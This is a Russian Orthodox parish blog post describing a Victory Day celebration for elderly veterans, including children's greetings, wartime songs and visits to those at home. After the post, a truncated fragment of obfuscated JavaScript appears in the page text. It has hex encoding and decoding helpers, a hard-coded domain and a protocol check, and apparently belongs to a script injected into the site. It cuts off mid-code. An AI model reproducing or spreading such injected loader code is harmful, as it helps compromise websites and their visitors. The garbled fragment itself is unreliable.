Поздравление ветеранов в Кафедральном соборе

IMG_9726


В этом году светлая седмица завершилась великим государственным праздником, важным для каждой семьи в нашей стране – Днем Победы.
Накануне праздника для ветеранов, прихожан Спасо-Преображенского кафедрального собора, была организована праздничная встреча с подарками, угощением и трогательными поздравлениями от правнуков великой Победы — маленьких прихожан из семейного клуба.
Те страшные годы оставили свой след в судьбах наших старейшин. Есть среди них и дети войны, и те, кто пережил блокаду Ленинграда. Но сегодня четыре поколения вместе и с большой радостью сквозь слезы поют любимые песни военных лет.
Тех ветеранов, что по состоянию здоровья не смогли прийти на праздник, наша дружная агитбригада поздравила дома.
Такое внимание, теплое отношение, возможность дружеского общения, а также чувство сопричастности и нужности нашей большой приходской семье крайне важно для наших ветеранов.
С каждым годом ряды победной гвардии тают, их остается очень мало. От нас, наследников победителей, требуется не так уж и много – быть чуточку внимательнее к тем, кто познал страшное горе и лишения, и наполнить их день сегодняшний теплом и заботой. Торопитесь успеть сотворить добро!

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "blogs.pravostok.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Запись опубликована в рубрике Наша община. Добавьте в закладки постоянную ссылку.

Добавить комментарий

Ваш адрес email не будет опубликован.